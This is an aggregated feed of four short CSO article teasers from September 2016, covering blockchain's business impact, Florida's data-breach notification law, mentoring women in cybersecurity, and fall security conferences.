CSO.webp 2016-09-06 05:12:00 How blockchain will disrupt your business (direct link) Like mobile and cloud, blockchain, first implemented in the original source code of bitcoin in 2009, stands poised to profoundly disrupt business. If it lives up to its promise, it won't just be financial institutions that are disrupted. "If you can transfer money or something of value through the internet just like another form of data, what else can you do with it? It provides a way to establish trust in the digital world," says Angus Champion de Crespigny, Financial Services Blockchain and Distributed Infrastructure Strategy Leader, Ernst & Young. "How do you ensure something is the original copy of something on the internet? Prior to blockchain technology, you couldn't." Guideline
CSO.webp 2016-09-02 07:50:00 IDG Contributor Network: Florida privacy law adds breach notification and strengthens compliance (direct link) We all remember from our early education learning about the three major branches of government in the US: the executive, the legislative and the judicial branches. But how does our legal system work to create privacy law for all our different business sectors? Hint: it's not how they do it in Europe. We begin by looking at constitutional law. The U.S. and state constitutions are the primary source of law in America. However, a state constitution may afford more privacy protection than the broader U.S. Constitution. Enter FIPA, the Florida Information Protection Act of 2014. Each state has its own flavor of data privacy law, if it has one at all. FIPA says, "An act relating to security of confidential personal information; providing a short title; repealing s. 4 817.5681, F.S., relating to a breach of security concerning confidential personal information in third-party possession; creating s. 501.171, F.S.; providing definitions; requiring specified entities to take reasonable measures to protect and secure data containing personal information in electronic form; requiring specified entities to notify the Department of Legal Affairs of data security breaches; requiring notice to individuals of data security breaches under certain circumstances..." Guideline
CSO.webp 2016-09-02 06:18:00 IDG Contributor Network: 4 important tips for mentoring, coaching and growing women's roles in cybersecurity (direct link) Women are underrepresented in every industry, at every level of companies. Even more discouraging, a report from the Wall Street Journal suggests that there are significantly fewer women in the higher ranks of companies, indicating that the growth of a female employee plateaus before her career has even taken off. Not surprisingly, a mere 11 percent of the world's information security workforce are women, and less than 2 percent of those women hold C-suite level positions. This begs the question: how can the women who have become industry leaders help those in entry-level positions grow and develop their careers? Put simply, by acting as mentors to foster career advancement and encourage continued growth. Guideline
CSO.webp 2016-09-02 03:06:00 Fall security conferences you don't want to miss (direct link) Check out more than foliage this fall. Conferences can be great opportunities for networking and information sharing. While it's a challenge to break away from the responsibilities at the office, taking a day or two to connect with peers across the industry can be invigorating and uplifting, allowing you to return with a fresh and optimistic perspective on the doldrums of threat intelligence. At the MASSTLC Conference in Cambridge, the message of keynote speaker Dave Mahon was to not see each event as a failure. Rather, see each event as an opportunity to learn. That's exactly how I feel about conferences. Attending a conference is the furthest thing from a drag. Each is an opportunity to learn. Here are nine conferences I wish I could attend this fall. Guideline
Last update at: 2024-05-16 09:08:06